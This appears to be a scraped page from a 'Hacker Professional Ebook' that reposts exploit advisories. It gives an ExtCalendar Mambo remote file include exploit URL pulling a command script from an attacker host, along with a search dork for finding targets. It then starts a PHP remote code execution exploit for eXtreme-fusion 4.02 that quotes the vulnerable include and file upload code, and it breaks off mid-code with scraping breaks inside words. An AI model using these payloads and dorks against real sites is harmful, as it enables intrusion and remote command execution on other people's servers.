Hacker Professional Ebook part 370 pptx

http://www.example.com/i-accueil.php?chemin=conc99 http://www.example.com/i-index.php?chemin=conc99 Black_hat_crHCE ExtCalendar Mambo Module.

http://www.example.com/i-accueil.php?chemin=conc99

http://www.example.com/i-index.php?chemin=conc99

Black_hat_cr(HCE)

ExtCalendar Mambo Module <= v2 Remote File Include Vulnerabilities

-

Title : ExtCalendar Mambo Module <= v2 Remote File Include Vulnerabilities

##################################################

#############################

Discovered By OLiBekaS

-

dork : "powered by ExtCalendar v2"

Exploit :

http://[target]/[path]/components/com_extcalendar/admin_events.php?CONFIG_E XT[LANGUAGES_DIR]=http://[attacker]/cmd.txt?&cmd=ls

-

greatz:

~~~~~

# Special greetz to my master effex and bEdAh`oTaK ( thank man )

# To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk,

brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy and other

-

Contact:

~~~~~~~

Nick: OLiBekaS

E-mail: olibekas[at]gmail[dot]Com

Homepage: http://bekas.6te.net

- [ eof ] -

baby_hacker(HCE) Extreme-fusion <= 4.02 Remote Code Execution Exploit PHP Code: <? //Kacper Settings $exploit_name = "extreme-fusion <= 4.02 Remote Code Execution Exploit"; $script_name = "eXtreme-fusion 4.02"; $script_site = "http://extreme-fusion.pl/download-cat16"; $dork = '"by eXtreme Crew"'; //************************************************************** print ' ::::::::: :::::::::: ::: ::: ::::::::::: :::

:+: :+: :+: :+: :+: :+: :+:

+:+ +:+ +:+ +:+ +:+ +:+ +:+

+#+ +:+ +#++:++# +#+ +:+ +#+ +#+

+#+ +#+ +#+ +#+ +#+ +#+ +#+

#+# #+# #+# #+#+#+# #+# #+#

######### ########## ### ########### ##########

::::::::::: :::::::::: ::: :::: ::::

:+: :+: :+: :+: +:+:+: :+:+:+

+:+ +:+ +:+ +:+ +:+ +:+:+ +:+

+#+ +#++:++# +#++:++#++: +#+ +:+ +#+

+#+ +#+ +#+ +#+ +#+ +#+

#+# #+# #+# #+# #+# #+#

### ########## ### ### ### ###

- - [DEVIL TEAM THE BEST POLISH TEAM] - -

[Exploit name: '.$exploit_name.'

[Script name: '.$script_name.'

[Script site: '.$script_site.'

dork: '.$dork.'

Find by: Kacper (a.k.a Rahim)

========> DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam <=======

=

========> http://www.rahim.webd.pl/ <========

Contact: kacper1964@yahoo.pl

(c)od3d by Kacper

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Greetings DragonHeart and all DEVIL TEAM Patriots :)

- Leito & Leon | friend str0ke ;)

pepi, nukedclx, SkD, MXZ, sysios, mIvus, wacky, xoron, fdj, mass, D3m0n (ziom

z Niemiec :P)

and

Dr Max Virus

TamTurk,

hackersecurity.org

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Greetings for 4ll Fusi0n Group members ;-)

and all members of hacker.com.pl ;)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

';

/*

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

in file infusions/fusion_forum_view/fusion_forum_view.php:

[line 1-5]

<?

if (file_exists(INFUSIONS."fusion_forum_view/locale/".$settings['locale'].".php") ) { // < -{2}

include INFUSIONS."fusion_forum_view/locale/".$settings['locale'].".php"; // < -{1}

} else {

include INFUSIONS."fusion_forum_view/locale/English.php";

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

in file submit.php:

[line 342-373]

if (isset($_POST['submit_photo'])) {

require_once INCLUDES."photo_functions_include.php";

$error = "";

$submit_info['photo_title'] = stripinput($_POST['photo_title']);

$submit_info['photo_description'] = stripinput($_POST['photo_description']); $submit_info['album_id'] = isNum($_POST['album_id']) ? $_POST['album_i d'] : "0";

if (is_uploaded_file($_FILES['photo_pic_file']['tmp_name'])) {

$photo_types = array(".gif",".jpg",".jpeg",".png");

$photo_pic = $_FILES['photo_pic_file'];

$photo_name = strtolower(substr($photo_pic['name'], 0, strrpos($photo_pic ['name'], ".")));

$photo_ext = strtolower(strrchr($photo_pic['name'],"."));

$photo_dest = PHOTOS."submissions/";

if (!preg_match("/^[-0-9A-Z_\[\]]+$/i", $photo_name)) {

$error = 1;

} elseif ($photo_pic['size'] > $settings['photo_max_b']){

$error = 2;

} elseif (!in_array($photo_ext, $photo_types)) {

$error = 3;

} else {

$photo_file = image_exists($photo_dest, $photo_name.$photo_ext); move_uploaded_file($photo_pic['tmp_name'], $photo_dest.$photo_file); // < -{3(step1)}

chmod($photo_dest.$photo_file, 0644);

$imagefile = @getimagesize($photo_dest.$photo_file);

if (!verify_image($photo_dest.$photo_file)) {

$error = 3;

unlink($photo_dest.$photo_file);

} elseif ($imagefile[0] > $settings['photo_max_w'] || $imagefile[1] > $set tings['photo_max_h']) {

$error = 4;

unlink($photo_dest.$photo_file);

} else {

$submit_info['photo_file'] = $photo_file;

}

}

}

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

in file submit.php:

[line 223-250]

if (isset($_POST['upload'])) {

opentable($locale['552']);

if ($_FILES['plik']['name']!="")

{

if(!file_exists("downloads/".$_FILES['plik']['name'])) {

move_uploaded_file($_FILES['plik']['tmp_name'],"downloads/".$_FILE S['plik']['name']); // < -{3(step2)}

switch($_FILES['plik']['error']) {

case '0': echo $locale['542'].round($_FILES['plik']['size'] / 1024).'KB'; $submit_info['download_title'] = stripinput($_POST['download_titl e']);

$submit_info['download_description'] = stripinput($_POST['downl oad_description']);

$submit_info['download_url'] = "downloads/".$_FILES['plik'][